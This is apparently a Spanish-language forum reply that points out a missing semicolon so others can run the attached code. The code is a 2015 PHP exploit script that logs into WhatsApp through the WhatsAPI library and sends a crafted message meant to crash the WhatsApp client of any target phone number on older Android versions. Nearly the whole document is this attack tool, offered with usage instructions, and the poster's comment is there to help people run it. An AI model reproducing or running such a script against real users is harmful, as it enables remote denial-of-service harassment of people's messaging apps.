interesante, pero agrego un punto y coma ( ; ) que falta en la línea 47, por si alguien lo quiere probar y no le funciona :3
Saludos!
<?php
/*
* Title: WhatsApp Remote Crash with PHP
* Product: WhatsApp
* Vendor Homepage: http://www.whatsapp.com
* Vulnerable Version(s): 2.11.476
* Tested on: WhatsApp v2.11.476 on Samsung Galaxy S4 2015 -Android 4.3
* Mirror: http://pastebin.com/Ktu45GN0
* Date: 05/02/2015
*
* Author Exploit:
* Rodrigo Avila - @el_rodrix - <[email protected]>
* Credits:
* Daniel Godoy - @0xhielasangre - <[email protected]>
* Gonza Cabrera - @Gonnza_Cabrera - <[email protected]>
*
* Reference: http://foro.remoteexecution.net/index.php/topic,569.0.html
* http://underc0de.org/foro/android/(poc)-crashear-la-app-de-un-contacto-de-whatsapp-(android)/msg82880/
* http://www.exploit-db.com/exploits/35637/
* http://www.exploit-db.com/exploits/32865/
*
* Custom message with non-printable characters will crash any WhatsApp client < v2.11.476 for android.
* It uses WhatsAPI library, that provides us with the options of registration, reading/sending messages, and even
* engaging in an interactive conversation over WhatsApp protocol
*/
require 'src/whatsprot.class.php';
function fgets_u($pStdn)
{
$pArr = array($pStdn);
if (false === ($num_changed_streams = stream_select($pArr, $write = NULL, $except = NULL, 0))) {
print("\$ 001 Socket Error : UNABLE TO WATCH STDIN.\n");
return FALSE;
} elseif ($num_changed_streams > 0) {
return trim(fgets($pStdn, 1024));
}
return null;
}
$nickname = "RemoteExecution";
$sender = "549XXXXXXXXXX"; // Mobile number with country code (but without + or 00)
$imei = ""; // MAC Address for iOS IMEI for other platform (Android/etc)
$password = "XXXXXXXXXXXXXXXXXXXXXXXXXXXX"; // Password you received from WhatsApp
$msg = "RemoteExecution"; //Copy paste and send this message -> http://pastebin.com/bStYBbpd
$usage = "USAGE: ".$_SERVER['argv'][0]." <phone>\n \tphone: full number including country code, without '+' or '00'\n";
if ($argc < 2) {
echo $usage;
exit(1);
}
if (is_numeric($_SERVER['argv'][1])){
if (strlen($_SERVER['argv'][1]) == 13){
$dst = $_SERVER['argv'][1];
echo "[] Logging in as '$nickname' ($sender)\n";
$wa = new WhatsProt($sender, $imei, $nickname, false);
$wa->connect();
$wa->loginWithPassword($password);
echo "\n[] Send message to $dst: $msg\n";
$wa->sendMessage($dst , $msg);
echo "\n";
exit(0);
}else{
echo $usage;
}
}else{
echo $usage;
}